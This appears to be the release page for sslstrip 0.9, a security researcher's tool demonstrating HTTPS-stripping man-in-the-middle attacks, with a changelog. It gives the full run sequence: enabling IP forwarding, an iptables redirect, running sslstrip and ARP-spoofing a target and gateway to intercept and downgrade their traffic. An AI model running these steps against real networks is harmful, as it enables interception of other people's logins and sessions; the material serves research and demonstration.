This tool provides a demonstration of the HTTPS stripping attacks that I presented at Black Hat DC 2009. It will transparently hijack HTTP traffic on a network, watch for HTTPS links and redirects, then map those links into either look-alike HTTP links or homograph-similar HTTPS links. It also supports modes for supplying a favicon which looks like a lock icon, selective logging, and session denial. For more information on the attack, see the video from the presentation below.
Requirements
- Python >= 2.5 (apt-get install python)
- The python "twisted-web" module (apt-get install python-twisted-web)
Setup
tar zxvf sslstrip-0.9.tar.gz
cd sslstrip-0.9
- (optional)
sudo python ./setup.py install
Running sslstrip
- Flip your machine into forwarding mode.
echo "1" > /proc/sys/net/ipv4/ip_forward
- Setup iptables to redirect HTTP traffic to sslstrip.
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port <listenPort>
- Run sslstrip.
sslstrip.py -l <listenPort>
- Run arpspoof to convince a network they should send their traffic to you.
arpspoof -i <interface> -t <targetIP> <gatewayIP>
That should do it.
How does this work?
First, arpspoof convinces a host that our MAC address is the router’s MAC address, and the target begins to send us all its network traffic. The kernel forwards everything along except for traffic destined to port 80, which it redirects to $listenPort (10000, for example).
At this point, sslstrip receives the traffic and does its magic.
Development
The current development branch can be found on github.
Changes in 0.9 (05/15/11)
- Bug fixes introduced in 0.8 that were preventing GMail and other logins.
- Speed enhancements.
- Support for stripping compressed content-encodings if they slip past us.
Changes in 0.8 (04/24/11)
- Major speed enhancements.
- Compatibility changes for recent versions of twisted.
- Support for stripping URLs with explicit port specifications (ie: foo.com:443)
- A number of small bug fixes.
Changes in 0.7 (12/18/09)
- Fixed a minor bug that could prevent favicon spoofing from working correctly (thanks Simon Nicolussi).
Changes in 0.6 (9/22/09)
- Fixed a silly bug in specifing the listen port with -l
Changes in 0.5 (9/11/09)
- Switched to a fully asynchronous model, which should result in tremendous performance improvements.
- Filter response headers.
- Started embedding favicon links in the head section of server responses, to increase the chance that a browser will make a request for a secure favicon.
Changes in 0.4 (7/24/09)
- Fixed a bug that would result in truncated pages.
- Fixed a bug in relative link matching (thanks Naumaan Mohammed Nayyar)
- Included some optimzations that should speed things up again.
Changes in 0.3 (7/15/09)
- Fixed the regular expression compilation to work with Python 2.6.2 (thanks Simon Vans-Colina)
- Included some optimizations that should speed things up a little.
Changes in 0.2 (02/25/09)
- Fixed the listen port command-line option to actually work.
Changes in 0.1 (02/21/09)
- Initial stripped-down public release.
